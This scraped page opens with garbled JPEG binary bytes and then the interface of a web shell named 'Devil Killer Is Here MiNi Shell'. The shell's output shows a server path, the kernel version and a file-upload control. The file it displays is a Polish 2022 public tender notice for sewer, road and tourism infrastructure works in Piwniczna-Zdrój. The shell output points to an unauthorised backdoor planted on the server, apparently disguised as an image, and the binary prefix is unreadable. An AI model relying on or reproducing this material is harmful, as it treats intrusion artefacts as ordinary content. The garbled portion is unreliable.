JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220424/0013225801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa infrastruktury turystycznej, modernizacja sieci wod - kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Piwniczna-Zdrój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893084</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piwniczna-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@piwniczna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piwniczna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa infrastruktury turystycznej, modernizacja sieci wod - kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a5ed5ee-c3cd-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00132258</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00038243/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa infrastruktury turystycznej,modernizacja sieci wod-kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna-Zdrój</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://piwniczna.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://piwniczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.1 Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana infor-macji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, od-bywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem platformy zakupo-wej dostępnej pod adresem: https://piwniczna.ezamawiajacy.pl w zakładce „ Korespondencja”<br/>12.2. Sposób sporządzenia dokumentów elektronicznych oświadczeń lub elektronicznych kopii do-kumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informa-cji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elek-tronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich mo-że żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415). <br/><br/>12.3 Ogólne zasady korzystania z Platformy<br/>12.3.1 zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Miasta i Gminy Piwniczna -Zdrój https://piwniczna.ezamawiajacy.p, lub https://oneplace.marketplanet.pl.<br/>12.3.2 Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>12.3.3.	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawia-jący zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. <br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możli-wości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. <br/>12.5.4 .Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunika-cja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, prze-kazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupo-wej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednic-twem zakładki „Korespondencja”.<br/>12.6. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 20 MB w, rtf, pdf , doc, docx,.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobo-wych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zama-wiający informuje, że: <br/>24.1. Administratorem Państwa danych osobowych jest Miasto i Gmina Piwniczna -Zdrój, ul. Rynek 20, 33-350 Piwniczna -Zdrój .<br/>24.2. Miasto i Gmina Piwniczna -Zdrój wyznaczyła Inspektora Ochrony Danych. Pan Andrzej Włodarczyk, adres e-mail: inspektor@odo.info.pl;<br/>24.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu zwią-zanym z postępowaniem o udzielenie przedmiotowego zamówienia publicznego <br/>24.4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zo-stanie dokumentacja postępowania w oparciu o art. 18-19 ustawy. <br/>24.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>24.6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. <br/>24.7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zauto-matyzowany, stosowanie do art. 22 RODO. <br/>24.8. Posiadają Państwo: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO. <br/>24.9. Nie przysługuje Państwu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>24.10. Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">24.10. Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy <br/>Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy: <br/>− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z upraw-nienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć 3<br/>Budowa infrastruktury turystycznej, modernizacja sieci wod -kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój - Budowa 2,950 km sieci kanalizacji sanitarnej -- <br/><br/>Określenie przedmiotu zamówienia<br/>3.1.Przedmiotem zamówienia jest Budowa infrastruktury turystycznej, modernizacja sieci wod-kan oraz dróg wraz z cyfryzacją usług w gminie Piwniczna -Zdrój cześć 3 - Modernizacja oraz budowa 2,950 km sieci kanalizacji sanitarnej <br/><br/>3.1.1.Zakres robót obejmuje:<br/> Modernizację i budowę 2,950 km sieci kanalizacji sanitarnej - cześć 3<br/><br/>3.1.1.1	w trybie zaprojektuj i wybuduj – zgodnie z załącznikiem - p.n. - <br/><br/>- Załącznik nr 1 do Cz. 3 PFU_ŁOMNICA-ZDRÓJ-KĄTY_Piwniczna Zdrój v2<br/>Zakres robót obejmuje: sieć kanalizacyjną o długości 400,00 m (Łomnica Zdrój Kąty).<br/><br/>- w trybie zaprojektuj i wybuduj – zgodnie z załącznikiem - p.n. - <br/> <br/>- Załącznik nr 1 do Cz. 3 PFU_Łomnica-Zdrój<br/>Zakres robót obejmuje: sieć kanalizacyjną o długości 338,06 m (Łomnica Zdrój).<br/>3.1.1.2 <br/>- zgodnie z dokumentacją projektowa p.n. Projekt Budowlany Sieć kanalizacji sanitarnej Głębokie opracowaną przez ISAN Pracownia Projektowa Sieci i Instalacji Sanitarnej Nowy Sącz.<br/>Zakres robót obejmuje: sieć kanalizacyjną o długości 80,5 m w zakresie studni S15 do S20 (Głębokie).<br/>-Załącznik nr 1 do Cz. 3 Operat wodnoprawny Głębokie<br/>-Załącznik nr 1 do Cz.3 Mapa do celów projektowych (2) Głębokie<br/>-Załącznik nr 1 do Cz.3 Profil kanalizacji Głębokie<br/>-Załącznik nr 1 do Cz.3 zmian miejscowego planu Głębokie<br/>-Załącznik nr do Cz.3 Mapa do celów projektowych (1) Głębokie<br/>-Załącznik nr 1 do Cz.3 Profil kanalizacji Głębokie nr rys.3<br/>-Załącznik nr 1 do Cz.3 Plansza do Uzgodnień (o) kanalizacja Głębokie<br/>-Załącznik nr 1 do Cz.3 Plansza do uzgodnień<br/>-Załącznik nr 1 do Cz.3 Profil kanalizacji Głębokie nr rys.2<br/>-Załącznik nr 1 do Cz.3 Projekt budowlany kanalizacja Głębokie<br/>-Załącznik nr 1 do Cz.3 Projekt zagospodarowania terenu kanalizacja Głębokie<br/><br/>- zgodnie z dokumentacją projektowa p.n. Projekt Budowlany Sieć kanalizacji sanitarnej Łomnickie opracowaną przez ISAN Pracownia Projektowa Sieci i Instalacji Sanitarnej Nowy Sącz.<br/>Zakres robót obejmuje: sieć kanalizacyjną o długości 697,44 m (Łomnickie).<br/>Załącznik nr 1 do Cz.3 01. PZ - kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 05. Studnia kanalizacyjna Łomnickie<br/>Załącznik nr 1 do Cz.3 1. Opis kan. sanitarnej kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 02. PZ - kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 2. Odpisy i uzgodnienia, Bioz kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 03. Profil podłużny - kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 04. Profil podłużny przyłączy - kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 06. Studzienka kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 STWiORB kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Piwniczna Opis- Geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.3 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 1 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 2 geologia kanalizacja Łomnicka<br/>Załącznik nr 1 do Cz.3 Zał. 3.1 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.2 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.4 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.5 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.6 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 3.7 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 4 geologia kanalizacja Łomnickie<br/>Załącznik nr 1 do Cz.3 Zał. 5 geologia kanalizacja Łomnickie<br/><br/>3.1.1.3.	Modernizacja rurociągu tłocznego przebiegającego pod rzeką Poprad o długości 1 434 m.<br/>Załącznik nr 1 do Cz.3 Opis przedmiotu zamówienia<br/>Zamawiający informuje, że z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków, opis przedmiotu<br/>zamówienia zawarta jest w SWZ<br/>3.3.4. Wspólny Słownik Zamówień: <br/><br/>45100000-8 Przygotowanie terenu pod budowę<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>45111291-4 Roboty w zakresie zagospodarowania terenu<br/>45111300-1 Roboty rozbiórkowe<br/>45112100-6 Roboty w zakresie kopania rowów<br/>45112200-7 Usuwanie powłoki gleby<br/>45112210-0 Usuwanie wierzchniej warstwy gleby<br/>45112700-2 Roboty w zakresie kształtowania terenu<br/>45112710-5 Roboty w zakresie kształtowania terenów zielonych<br/>45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków<br/>45232400-6 Roboty budowlane w zakresie kanałów ściekowych<br/>45232410-9 Roboty w zakresie kanalizacji ściekowej<br/>45232440-8 Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków<br/>45232460-4 Roboty sanitarne<br/>45233140-2 Roboty drogowe<br/>45233142-6 Roboty w zakresie naprawy dróg<br/>45233220-7 Roboty w zakresie nawierzchni dróg<br/>45233320-8 Fundamentowanie dróg<br/>45236000-0 Wyrównywanie terenu<br/>45232423-3 Roboty budowlane w zakresie przepompowni ścieków </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45112200-7 - Usuwanie powłoki gleby</p> <p class="mb-0">45112210-0 - Usuwanie wierzchniej warstwy gleby</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cześć 3<br/>Sposób oceny ofert: Zamawiający w procedurze badania i oceny ofert w pierwszej kolejności<br/>dokona rozstrzygnięcia, które oferty podlegają odrzuceniu w oparciu o okoliczności wskazane w art.<br/>226 ustawy pzp. Dokona także procedury poprawy omyłek oraz weryfikacji ofert pod kątem „rażąco<br/>niskiej ceny”.<br/>Ocenie punktowej będą podlegały oferty nie podlegające odrzuceniu. Dane do wskazanych poniżej<br/>wzorów w procesie oceny na podstawie kryteriów będą wprowadzane z ofert nie podlegających<br/>odrzuceniu. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.<br/>Kryteria i sposób oceny oferty:<br/>- cena - Maksymalna ilość punktów w kryterium - 60.<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w<br/>ofercie, a ilość punktów obliczana będzie według poniższego wzoru:C = WP x Cnaj/cof<br/>– okres rękojmi - Maksymalna ilość punktów w kryterium - 40<br/>1) okres rękojmi liczony jest w miesiącach;<br/>2) minimalny okres rękojmi wynosi 60 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu<br/>rękojmi krótszego niż 60 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle<br/>nie wskaże w ofercie oferowanego okresu rękojmi zamawiający przyjmie, że Wykonawca nie oferuje<br/>rękojmi i ofertę odrzuci;<br/>3) maksymalny okres rękojmi wynosi 84 miesiące - wskazany w formularzu ofertowym okres rękojmi<br/>powyżej 84 miesięcy liczony będzie jako okres rękojmi 84 miesiące;<br/>4) Wykonawcy oferują długość okresu rękojmi w pełnych miesiącach;<br/>5) ocena punktowa oferty w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>R = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: 